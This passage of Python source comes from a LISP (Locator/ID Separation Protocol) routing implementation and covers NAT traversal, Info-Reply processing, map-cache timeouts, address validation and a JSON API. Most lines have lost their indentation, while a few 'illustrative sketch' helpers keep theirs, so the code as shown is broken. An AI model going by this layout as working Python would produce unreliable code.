# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(list(rtr_list.values()))):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), list(rtr_list.keys())))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (addr_str in lisp_rtr_list):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in list(lisp_iid_to_interface.keys()):
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
last_refresh_time = mc.last_refresh_time
#
# If mapping system runs on this system, disregard packet activity.
# There could be a race condition for active sources, where destinations
# are not registered yet due to system restart. If the LISP subsystem
# is within 5 minutes of restarting, time out native-forward entries.
#
if (lisp_is_running("lisp-ms") and lisp_uptime + (5*60) >= now):
if (mc.action == LISP_NATIVE_FORWARD_ACTION):
last_refresh_time = 0
lprint("Remove startup-mode native-forward map-cache entry")
#endif
#endif
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
ut = lisp_print_elapsed(mc.uptime)
lrt = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint(("Map-cache entry {} {}, had uptime {}, last-refresh-time {}"). \
format(green(prefix_str, False), bold("timed out", False), ut, lrt))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array of lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (hostname not in lisp_nat_state_info):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
    # So this is not a refresh of the youngest entry. See if it exists as
    # an older entry. If not, we prepend the new state; otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (hostname not in lisp_nat_state_info): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
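#
# lisp_example_refresh_encap_port
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# It shows how lisp_store_nat_info() and lisp_get_nat_info() pair up: the
# Info-Request path stores the translated RLOC/port for a hostname, and the
# map-cache path later looks it up to fix the encapsulation port of an RLOC,
# as lisp_update_encap_port() does.
#
def lisp_example_refresh_encap_port(hostname, rloc_entry):
    nat_info = lisp_get_nat_info(rloc_entry.rloc, hostname)
    if (nat_info == None): return(False)
    if (rloc_entry.translated_port == nat_info.port): return(False)
    rloc_entry.store_translated_rloc(rloc_entry.rloc, nat_info.port)
    return(True)
#enddef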
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request on, and install an
# ephemeral static route to force the Info-Request out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in list(lisp_map_resolvers_list.values()):
mr_list.append(mr.map_resolver)
        #endfor
dest_list = mr_list
if (dest_list == []):
for ms in list(lisp_map_servers_list.values()):
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in list(lisp_map_resolvers_list.values()):
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
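#
# lisp_example_valid_addresses
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# Each sample below exercises one syntax accepted by
# lisp_valid_address_format(): IPv4, IPv6, MAC, E.164, and distinguished-name.
#
def lisp_example_valid_addresses():
    samples = ["10.0.0.1", "fe80::1", "0000-1111-2222", "+14085551212",
        "'my-distinguished-name'"]
    return([lisp_valid_address_format("address", s) for s in samples])
#enddef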
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
# Variable "data_structure" is a string and not a byte string. Caller converts.
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
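#
# lisp_example_api_map_cache_request
#
# Illustrative sketch only; this hypothetical helper is not called anywhere.
# It builds the "<data-structure-name>%<json-parameters>" string that
# lisp_process_api() expects, here for a specific map-cache entry lookup.
#
def lisp_example_api_map_cache_request(iid, eid_prefix):
    parms = {"instance-id" : str(iid), "eid-prefix" : eid_prefix}
    return("map-cache%" + json.dumps(parms))
#enddef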
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in list(rloc.multicast_rloc_probe_list.values()):
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
addr_str = None
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
addr_str = r["address"]
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
addr_str += ":" + r["encap-port"]
#endif
if (addr_str and addr_str in lisp_crypto_keys_by_rloc_encap):
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key != None and key.shared_key != None):
r["encap-crypto"] = "crypto-" + key.cipher_suite_string
#endif
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
state_change = lisp_print_elapsed(rloc.last_state_change)
if (state_change == "never"):
state_change = lisp_print_elapsed(rloc.uptime)
#endif
r["uptime"] = state_change
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in list(site_cache.cache[ml].entries.values()):
if (se.accept_more_specifics == False): continue
if (se.site.site_name not in sites):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if ("dns-name" in data) else None
if ("address" in data):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in list(lisp_map_servers_list.values()):
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if ("group-prefix" in parms):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (device in lisp_myinterfaces):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
    # return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-device (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (device not in lisp_myinterfaces): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
